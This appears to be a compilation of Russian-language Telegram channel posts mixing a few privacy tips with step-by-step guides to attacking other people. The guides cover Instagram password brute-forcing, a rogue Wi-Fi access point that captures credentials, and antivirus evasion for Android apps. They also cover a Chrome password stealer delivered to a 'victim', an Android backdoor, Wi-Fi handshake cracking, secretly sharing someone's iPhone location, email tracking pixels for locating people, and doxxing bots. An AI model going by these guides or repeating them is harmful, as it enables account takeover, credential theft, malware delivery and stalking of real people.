​​Какие данные собирают о вас сайты?

Когда вы сидите и провите время за сёрфингом в интернете, о вас собирают данные множество сайтов, а вы об этом даже не подозреваете.

Blacklight поможет вам узнать, какие именно сайты собирают ваши данные. Данный сервис выявит не только сайты, но и какую именно технологию отслеживания они используют.

Перечень того, что может использовать сайт покажет вам сервис: использование рекламных трекеров, отпечатки браузера, отслеживание движений мыши, клики, сетевую активность.

▫️https://themarkup.org/blacklight

​Блокировка рекламы без расширений

Большинство расширений увеличивают нагрузку браузера на операционную систему, и чем их больше - тем медленнее работает браузер. Чтобы уменьшить нагрузку на браузер, можно найти альтернативы некоторым расширениям, например Adguard DNS.

Adguard специализируется на блокировке нежелательной рекламы, и в качестве альтернативы расширениям предлагает подключение через собственные DNS-сервера. Во время загрузки страницы DNS-сервер отсеивает запросы к трекерам и рекламным сервисам.

Главное преимущество этого подхода - ничего не нужно устанавливать. Вам достаточно указать DNS-сервера AdGuard в настройках подключения к сети, и вы получите защиту от рекламы для вашего компьютера или смартфона. Также DNS можно поменять в роутере, тогда защита распространится на всю локальную сеть.

Adguard DNS можно настроить на любой платформе. Подробную инструкцию для каждой из них вы можете найти здесь.

#security

Xiaomi запатентовала технологию обнаружения посторонних лиц

Согласно описанию патента для обнаружения нежелательных лиц в смартфон пользователя будет встроен специальный датчик, который сможет определить, что кто-то посторонний заглядывает в экран.

При обнаружении постороннего система либо предупредит пользователя, либо примет защитные меры самостоятельно, например, скрыв просматриваемое приложение.

#xiaomi

​​Взлом Instagram

Примерно год назад разработчики Instagram накосячили с очередным обновлением и дали возможность хакерам осуществлять взлом с помощью перебора паролей без каких-либо ограничений.

Из этого выходит, что Bruteforce всё ещё актуален, а для осуществления подобной атаки не нужны особые навыки и знания.

Установка:

Устанавливаем Termux

1. Скачиваем репозиторий GitHub:
git clone https://github.com/thelinuxchoice/instashell

2. Переходим:
cd instashell

3. Даём разрешение на запуск:
chmod +x instashell.sh

4. Запускаем TOR сервисы:
service tor start

5. Запуск
./instashell.sh

Готово. После запуска программы введите имя профиля жертвы в Instagram и путь к словарю с паролями.

​​OSINT разведка в Telegram

В данном посте пойдёт речь о достаточно полезном боте @TgScanRobot. Он позволит вам найти практически все публичные чаты в которых состоит цель.

Для поиска нужно переслать сообщение пользователя или же прислать Username/ID. Вам сразу будет выдан список всех публичных чатов в которых он состоит.

Данный бот на данный момент имеет в своей базе порядка 500 тыс. групп и информацию про 83-х миллионах активных юзеров. Минус в том, что за час можно выполнить максимум 10 запросов.

Также присутствует опция, которая предоставляет возможность самостоятельного добавления нового чата с помощью команды / add @groupname

▫️https://t.me/tgscanrobot

​​Точка доступа для перехвата данных

Зачастую люди попросту не хотят заботиться о безопасности своих данных, и подключаясь к "Халявному" Wi-Fi сильно рискуют отдать свои деньги в руки злоумышленника.

Сейчас будет рассмотрен способ создания файловой точки доступа для подобного перехвата:

1. Устанавливаем репозиторий GitHub:

- git clone https://github.com/P0cL4bs/WiFi-Pumpkin.git

2. Переходим в директорию утилиты:

- cd WiFi-Pumpkin

3. Даём права исполняющему файлу:

- chmod +x installer.sh

4. Установка всех компонентов:

- sudo ./installer.sh --install

5. Запуск:

- wifi-pumpkin

Будет запущен графический интерфейс, зайдите в раздел "Seetings" и дайте название вашей точке доступа, затем перейдите в "Activity Monitor Settings" и поставьте галочки на пунктах "HTTP-Requests", "HTTP-Authentication" и "Pumpkin Proxy".

​​Обходим антивирус на Android

Самые обычные юзеры ОС Android не подозревают об опасности софта, установленного из Play Market.

Даже в нем есть заражённое вирусами ПО, простой пример: в 2019 году компания Trend Micro нашла более 50-и подобных приложений.

Разработчики обходят защиту за счёт маскировки логики программы, это называют обфускацией. Данный способ можно использовать с помощью инструмента AVPass.

Установка:

- git clone https://github.com/sslab-gatech/avpass

- ./install-dep.sh

Использование:

- python gen_disguise.py -i <название файла> individual

Будет сгенерирован APK файл, который не будет детектится большинством антивирусов.

​​Сбрасываем пароль от Kali Linux

Kali Linux - это эталон безопасности и анонимности, его работа полностью направлена на обеспечение полной конфиденциальности пользователя в интернете. Но каждая система имеет свои изъяны.

Если получилось так, что вы забыли свой пароль, то могу с уверенностью сказать - вам не стоит быть хакером. Но если серьёзно, то первым делом нужно перезапустить систему и подождать, пока откроется GNU GRUB.

Нажимаем на "E", тем самым открыв конфиг GRUB.

Ищем строку "linux /boot/vmlinuz-3.18", в конце нее ставим пробел и вписываем "single init=/bin/bash". Жмем F10, чтобы все сохранилось.

Сразу откроется терминал, вводите команды по порядку:

- mount -rw -o remount /

- passwd root

Надо прописать 2 раза новый пароль, далее:

- shutdown -h now

Новый пароль был успешно устанвлен!

​​Получаем доступ к сохраненным паролям Chrome

ChromePass - это терминальная утилита, написанная на языке программирования Python, она способна "добывать" сохраненные пароли в Chrome.

Установка:

- git clone https://github.com/darkarp/chromepass.git

- cd chromepass

- pip install -r requirements.txt

- python -m pip install --upgrade pip

- python -m pip install -r requirements.txt

- python create_server.py

После запуска, выбираем метод - client.exe, вводите свой IP. Если хотите, то включите сообщение об ошибке, и добавьте сообщение.

Осталось подождать пока всё будет готово. После этого запускаем client.txt, а файл server-ip.exe - должна получить ваша жертва. В файле client.txt появятся пароли.

​​​​Как определить безопасность онлайн магазина

В интернете существует большое количество скама и порой бывает сложно сразу отличить невооруженным глазом тру от мошенников.

Для того, чтобы легче было определять, можно воспользоваться ресурсом SiteJabber. Данная платформа сделана специально для потребителей, которая помогает находить качественные сайта, а что самое важное избегать мошенников. Также этот сайт содержит информацию и про обычные сайты

Чтобы проверить рейтинг сайта, перейдите на sitejabber.com. Вставьте ссылку на сайт в единственное поле для ввода и нажмите "Search". После этого, вы увидите рейтинг сайта, последний отзыв и все отзывы пользователей.

▫️http://sitejabber.com/

​​Отслеживаем местоположение IPhone

В IOS-13 и более поздних версиях, присутствует такое приложение, как "Локатор", оно позволяет пользователю делится информацией о своем местоположении с друзьями и родными.

Сразу можно понять, что такой функционал можно использовать не только с согласия пользователя, но и для намеренного шпионажа.

1) Откройте "Локатор" на Iphone, который будете отслеживать, перейдите во вкладку "Люди".

2) Найдите пункт "Поделиться геопозицией" или "Начать делиться геопозицией", активируйте его.

3) Введите имя или свой номер телефона человека (отправьте приглашение себе).

4) И наконец, выберите вариант "Поделиться".

Как только местоположение будет передано на ваше устройство, не забудье отклчючить передачу своих геоданных.

​​​Как сделать интерфейс Android плавнее через меню разработчика

Если вы сталкиваетесь с подвисаниями интерфейса на своем Android-устройстве, то читайте этот пост до конца, ведь сейчас мы покажем, как можно решить эту проблему через специальное меню «Для разработчиков».

1. Откройте «Настройки» -> «О телефоне».
2. Начните быстро кликать по пункту «Номер сборки», пока не активируется меню.
3. Перейдите в «Система» -> «Дополнительно» -> «Для разработчиков».
4. Пролистайте вниз и активируйте функцию «Отключить аппаратное наложение». Параметр также может называться "GPU ускорение".
5. Перезагрузите смартфон.

Учтите, что названия и расположения настроек может отличаться в зависимости от прошивки устройства.

Активация этой функции задействует видеокарту смартфона для обработки графических элементов интерфейса, делая взаимодействия с устройством визуально плавнее.

#android

​​Фейк ROOT

Если вы уже давно находитесь в теме Termux и не имеете root права, то 100% сталкивались с проблемой, когда Вы не можете установить утилиту из-за их отсутствия. Но есть решение, эти самые права Администратора можно легко эмулировать с помощью одного инструмента.

Установка:

- apt update -y
- apt upgrade -y
- apt install git
- git clone https://github.com/B41B4L/FakeRoot
- FakeRoot
- chmod +x Root.sh

Использование:

- ./Root.sh — запуск утилиты

Готово, для проверки мы можем написать, команду:
- whoami
Результат должен быть такой - root

Так-же есть альтернативный способ установки:
- pkg install fakeroot

И чтобы активировать режим Рут мы всегда прописываем команду:
- fakeroot

Вот как-то так можно обмануть систему, но если есть возможность, то стоить всё-таки потратить какое-то кол-во времени и наконец-то поставить нормальные Рут права.

​​Взлом Wi-Fi - AirGeddon

Существует такая утилита, как AirCrack. Взлом Wi-Fi с её использованием осуществляется путём перехвата и последующей расшифровки handshake.

AirGeddon - это инструмент, следующего поколения, способный автоматизировать данную операцию.
Он позволит Вам перехватывать и расшифровывать handshake в считанные секунды.

Установка:

- git clone https://github.com/v1s1t0r1sh3r3/airgeddon.git
- cd airgeddon/

Использование:

- bash airgeddon.sh — запуск утилиты

Сразу после запуска перед вами появится главное меню утилиты.
Для перехвата handshake нужно перевести сетевую карту в режим монитора, для этого пропишите "2", а затем "5".

Далее выберите пункт "Explore for targets", когда увидите нужную цель, нажмите "Ctrl+C". Затем выберите "Capture Handshake" и введите "2", подтвердите перехват.

​​Боты для OSINT в Telegram

OSINT — разведывательная дисциплина, включающая в себя поиск, выбор и сбор разведывательной информации из общедоступных источников, а также её анализ.

▫️Глаз бога - позволяет осуществлять поиск по телефону, по фотографии, по социальных сетях, по имени, по BTC адресу, по аккаунту Telegram, по адресу проживания, по номеру авто и многое другое.

▫️Get Contact - бот, который повторяет функционал нашумевшего приложения GetContact

▫️ Egrul - ищет информацию о юридических и физических лицах, учредителях, связях, местах регистрации.

▫️ Last4mail - находит связь почтового адреса к одноклассникам и сбербанку.

▫️Telesint - данный бот выдаёт информацию о том, в каких чатах в Telegram сидит пользователь.

▫️ ibhldr - показывает предпочтения юзера на основе собранный информации по чатам, каналам и т.п.

​​BackDoor на Android

Бэкдор - дефект алгоритма, который намеренно встраивается в него разработчиком и позволяет получить несанкционированный доступ к данным или удалённому управлению операционной системой и компьютером в целом.

Основной целью бэкдора является скрытное и быстрое получение доступа к данным, в большинстве случаев - к зашифрованным и защищённым. Например, бэкдор может быть встроен в алгоритм шифрования для последующей прослушки защищённого канала злоумышленником

Установка:

- apt update && apt upgrade
- apt install git && apt install python2
- git clone https://github.com/PyRAT-svg/msfgaf.git
- cd msfgaf

Использование:

- python2 install.py

Далее, где выйдет "Next", жмём на "Enter", а где y/n кликаем y.

​Проводим поиск пароля Wi-Fi

В том случае, если Вы по какой-то нелепой ситуации забыли пароль от Wi-Fi, не стоит отчаиваться, у вас есть возможность его легко найти через командную строку Windows 10.

Инструкция:

1. Первым делом нам надо открыть командную строку, просто наберите в меню "Пуск" - "cmd", и откройте её от имени Администратора.

2. В открывшемся окне введите команду:
- netsh wlan show profiles

Эта команда используется для поиска имени профиля WiFi, от которого вы ищите пароль.

3. Далее введите следующую команду:
- netsh wlan show profile name=”WiFi Profile Name” key=clear

Замените "WiFi Profile Name" на имя нужного WiFi.

Вот и всё, пароль от WiFi будет виден в поле Key Content

​Проверяем почту на предмет взлома

Вы можете даже не заметить, взломали вашу почту - или нет. Ведь в том случае, если действовал профессионал, никаких признаков взлома может не быть.

PnwedOrNot - это специализированная утилита, которая поможет вам узнать, была ли подвержена ваша электронная почта нападкам со стороны хакеров.

Инструмент действует путём поиска по базам утечек данных, в случае успеха при поиске, выдаёт все возможные вариации паролей.

Установка:

- git clone https://github.com/thewhiteh4t/pwnedOrNot.git

- pip install cfscrape

Использование:

- python pwnedornot.py

Далее вводим почту и ждём, пока завершится процесс. Если все пройдёт успешно, то вам будет предоставлен список паролей, которые могут быть связаны с аккаунтом.

​Получаем доступ к сохраненным паролям Chrome

ChromePass - это терминальная утилита, написанная на языке программирования Python, она способна "добывать" сохраненные пароли в Chrome.

Установка:

- git clone https://github.com/darkarp/chromepass.git

- cd chromepass

- pip install -r requirements.txt

- python -m pip install --upgrade pip

- python -m pip install -r requirements.txt

- python create_server.py

После запуска, выбираем метод - client.exe, вводите свой IP. Если хотите, то включите сообщение об ошибке, и добавьте сообщение.

Осталось подождать пока всё будет готово. После этого запускаем client.txt, а файл server-ip.exe - должна получить ваша жертва. В файле client.txt появятся пароли.

​Узнаём местоположение человека с помощью почты

Метод, показанный в этом посте, уже очень давно используется на западе, но в странах СНГ он только набирает свои обороты.

Для получения местоположения человека с помощью почты существует достаточно много утилит, инструментов и программ, сейчас будет рассмотрен инструмент - GetNotify.

GetNotify - это абсолютно бесплатный инструмент для отслеживания местоположения человека с помощью электронной почты.

Данный сервис работает принципом добавления невидимого изображения (т.е трекера) в исходящие письмо. После открытия письма, изображение загружается с сервера GetNotify.

В том случае, если вы не доверяете сторонним сервисам, то воспользуйтесь инструментом IPlogger, с помощью него можно с лёгкостью создать изображение с внедрением трекера.

▫️https://www.getnotify.com/
▫️https://iplogger.org/

​Генерация фейковой фотографии

В том случае, если вы хотите зарегистрироваться в какой-либо социальной сети, но не хотите палить свое настоящее лицо, на помощь вам придут специально созданные нейросети.

Сервис https://thispersondoesnotexist.com предоставляет возможность пользователю сгенерировать случайную фотографию человека, которого попросту не существует. Для повторного получения фото, перезагрузите страницу

Но если вы хотите применить какой-либо фильтр, то воспользуйтесь сервисом https://generated.photos/faces, он предоставляет возможность добавления критериев, т.е пол, возраст и так далее.